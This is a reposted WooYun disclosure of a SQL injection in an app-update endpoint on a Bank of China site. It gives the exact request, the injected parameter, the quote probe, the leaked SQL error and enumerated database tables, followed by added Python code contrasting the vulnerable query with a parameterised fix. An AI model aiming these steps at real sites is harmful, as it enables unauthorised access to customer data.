Bank of China: MySQL injection on one of its sites (admin password / large volume of user card-number data exposed)

Posted by admin, 2017-04-30 03:26:44
Summary

2016-05-05: Details reported to the vendor, awaiting vendor handling
2016-05-05: Vendor confirmed; details visible to the vendor only
2016-05-15: Details disclosed to core white hats and domain experts
2016-05-25: Details disclosed to regular white hats
2016-06-04: Details disclosed to intern white hats
2016-06-19: Details disclosed to the public

Vulnerability overview

Defect ID: WooYun-2016-205199

Title: Bank of China: MySQL injection on one of its sites (admin password / large volume of user card-number data exposed)

Vendor: Bank of China

Reporter: Aasron

Submitted: 2016-05-05 10:24

Published: 2016-06-19 22:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: www.wooyun.org; for questions or assistance please contact

Tags: php + string-type injection, MySQL, injection techniques



Vulnerability details

Brief description:

MySQL injection on a Bank of China site (admin password / millions of user records exposed)

Detailed description:

PUT /interFace/getAppUpdate.php HTTP/1.1
Host: open.boc.cn
Content-Type: application/json
Connection: close
Accept: application/json
User-Agent: ESchool/1.1 CFNetwork/758.3.15 Darwin/15.4.0
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Content-Length: 29

{"clientid":"399","type":"1"}
Injected parameter: clientid

Normal response:

{"clientkey":"399","version":"1.0.2","appversion":"177","appurl":"http:////open.boc.cn//apps//appdownload//41295","need_update":"0","new_function":"","appfilesize":"","incrementSize":""}

Error response (with a single quote appended to clientid):

<b>MySQL server error report:Array
(
[0] => Array
(
[message] => MySQL Query Error
)

[1] => Array
(
[sql] => SELECT goods_name,ios_file,app_version,goods_id,client_key as clientkey,need_update,new_function,category_ver as appversion FROM `ec`.`aps_goods` where client_key=399'
)

[2] => Array
(
[error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
)

[3] => Array
(
[errno] => 1064
)

)

Proof of vulnerability:

available databases [11]:
[*] bim
[*] container
[*] ec
[*] ezcis
[*] information_schema
[*] mysql
[*] ndbinfo
[*] performance_schema
[*] sap
[*] test
[*] ultrax

Current database: ec

+-------------------------------+
| aps_account_log |
| aps_ad |
| aps_ad_custom |
| aps_ad_position |
| aps_admin_action |
| aps_admin_log |
| aps_admin_message |
| aps_admin_user |
| aps_adsense |
| aps_affiliate_log |
| aps_agency |
| aps_apps |
| aps_apps_bak150321 |
| aps_apps_bak151205 |
| aps_apps_cat |
| aps_apps_relation |
| aps_area_region |
| aps_article |
| aps_article_cat |
| aps_article_cat_bak |
| aps_article_comment |
| aps_attribute |
| aps_auction_log |
| aps_auto_manage |
| aps_back_goods |
| aps_back_order |
| aps_bank_info |
| aps_banner |
| aps_bonus_type |
| aps_booking_goods |
| aps_brand |
| aps_card |
| aps_card_trans_audit |
| aps_cart |
| aps_cat_recommend |
| aps_category |
| aps_collect_goods |
| aps_comment |
| aps_crons |
| aps_custom_pads |
| aps_customs |
| aps_dcode |
| aps_delivery_goods |
| aps_delivery_order |
| aps_dic_h5_interface |
| aps_dic_paper_category |
| aps_dic_site_letter |
| aps_download_log |
| aps_email_list |
| aps_email_sendlist |
| aps_error_log |
| aps_exchange_goods |
| aps_failedlogin |
| aps_favourable_activity |
| aps_feedback |
| aps_friend_link |
| aps_general_bank |
| aps_general_interface |
| aps_goods |
| aps_goods_20141206 |
| aps_goods_activity |
| aps_goods_article |
| aps_goods_attr |
| aps_goods_bak150321 |
| aps_goods_bak151205 |
| aps_goods_cat |
| aps_goods_gallery |
| aps_goods_interface |
| aps_goods_interface_bak151205 |
| aps_goods_relation |
| aps_goods_type |
| aps_goods_whites |
| aps_group_goods |
| aps_interface |
| aps_interface0321 |
| aps_keywords |
| aps_link_goods |
| aps_log_conf |
| aps_log_data |
| aps_log_goods_download |
| aps_mail_templates |
| aps_manage_ip |
| aps_match_goods |
| aps_matchor |
| aps_member_price |
| aps_nav |
| aps_order_action |
| aps_order_goods |
| aps_order_info |
| aps_pack |
| aps_package_goods |
| aps_para_info |
| aps_para_type |
| aps_pay_log |
| aps_payment |
| aps_plugins |
| aps_poster |
| aps_poster_copy |
| aps_products |
| aps_reg_extend_info |
| aps_reg_fields |
| aps_region |
| aps_role |
| aps_searchengine |
| aps_sessions |
| aps_sessions_data |
| aps_shipping |
| aps_shipping_area |
| aps_shop_config |
| aps_snatch_log |
| aps_special_url |
| aps_stats |
| aps_suppliers |
| aps_tag |
| aps_template |
| aps_topic |
| aps_user_account |
| aps_user_address |
| aps_user_app |
| aps_user_bonus |
| aps_user_feed |
| aps_user_pictures |
| aps_user_pictures_copy |
| aps_user_rank |
| aps_user_test_account |
| aps_user_test_card |
| aps_user_trans_audit |
| aps_users |
| aps_users_bak |
| aps_users_bak150321 |
| aps_users_bak150321_copy |
| aps_users_copy |
| aps_validate_code |
| aps_validate_code_copy |
| aps_virtual_card |
| aps_volume_price |
| aps_vote |
| aps_vote_log |
| aps_vote_option |
| aps_wholesale |
+-------------------------------+


To protect user safety, testing was not taken any further.

Fix:

Filter the input, that sort of thing.
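"Filtering" the input is, in concrete terms, three things: validate the type of clientid before it reaches the query, bind it as a parameter instead of splicing it into the SQL text, and stop echoing the driver's error report to the client, since that report is what leaked the full statement and table name above. The block below is an added Python example, not code from the report or from the affected site (which is PHP): it reproduces the string-splicing bug against an in-memory SQLite table next to a hardened handler. Table and column names are taken from the SQL visible in the error report; the row data, function names and HTTP status mapping are assumptions made for the illustration.

```python
"""Added example (not code from the original report): the error-based
injection pattern from the report reproduced against an in-memory SQLite
table, beside a hardened request handler."""
import json
import sqlite3

# Constructed schema mirroring the columns named in the leaked SQL.
# The single row is made up for the demonstration.
SCHEMA = """
CREATE TABLE aps_goods (
    goods_id INTEGER PRIMARY KEY,
    goods_name TEXT, ios_file TEXT, app_version TEXT,
    client_key TEXT, need_update TEXT, new_function TEXT, category_ver TEXT
);
INSERT INTO aps_goods VALUES
    (41295, 'ESchool', 'appdownload/41295', '1.0.2', '399', '0', '', '177');
"""


def make_db():
    """Return a fresh in-memory database loaded with the constructed row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, clientid):
    """Mirrors the original defect: the JSON value is spliced into the SQL.
    A value of 399' produces "... where client_key=399'" and a syntax
    error, the same class of failure as the MySQL errno 1064 in the report."""
    sql = ("SELECT client_key AS clientkey, app_version AS version, "
           "category_ver AS appversion FROM aps_goods "
           "where client_key=" + str(clientid))
    return conn.execute(sql).fetchone()


def injection_breaks_query(conn, clientid):
    """True if the spliced query fails to parse for this input (hypothetical
    helper so the behaviour can be checked without the driver's exception)."""
    try:
        lookup_vulnerable(conn, clientid)
        return False
    except sqlite3.Error:
        return True


def handle_update_request(conn, body):
    """Hardened handler: validate the type, bind the parameter, and never
    return database error text to the client. Returns (status, payload)."""
    try:
        payload = json.loads(body)
        clientid = int(payload["clientid"])   # 399' is rejected here
    except (ValueError, KeyError, TypeError):
        return 400, {"error": "invalid request"}
    try:
        row = conn.execute(
            "SELECT client_key, app_version, category_ver FROM aps_goods "
            "WHERE client_key = ?", (str(clientid),)).fetchone()
    except sqlite3.Error:
        # Log the driver error server-side; the client gets a generic message.
        return 500, {"error": "internal error"}
    if row is None:
        return 404, {"error": "unknown client"}
    return 200, {"clientkey": row[0], "version": row[1], "appversion": row[2]}


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "399"))
    print(injection_breaks_query(db, "399'"))
    print(handle_update_request(db, '{"clientid":"399","type":"1"}'))
    print(handle_update_request(db, '{"clientid":"399\'","type":"1"}'))
```

The integer check alone would have stopped this particular probe, but the bound parameter is what makes the query safe regardless of how the value is validated, and the generic error response is what keeps a future mistake from handing out schema details.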

Copyright notice: please credit the source when reposting: Aasron@WooYun


Vendor response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2016-05-05 22:07

Vendor reply:

Thanks to the white hat

Latest status:

None yet




Comments

  1. 2016-05-05 10:37 | Dotaer ( Passerby | Rank:28 Vulns:8 | Study more, dig more bugs!)

    1

    Master, are you taking apprentices?

  2. 2016-05-05 10:59 | 无名 ( Intern white hat | Rank:41 Vulns:9 | I'm just a little rookie, yi-ya-yi-er-yo.)

    0

    A bank...

  3. 2016-05-05 11:25 | 开心一下1313 ( Intern white hat | Rank:77 Vulns:27 | Take a sip of water and calm down......)

    0

    Rich.

  4. 2016-05-06 08:17 | _Thorns ( Regular white hat | Rank:1754 Vulns:269 | Most people put in so little effort that it never even comes down to...)

    0

    Looks like bro's magic tool is already written.
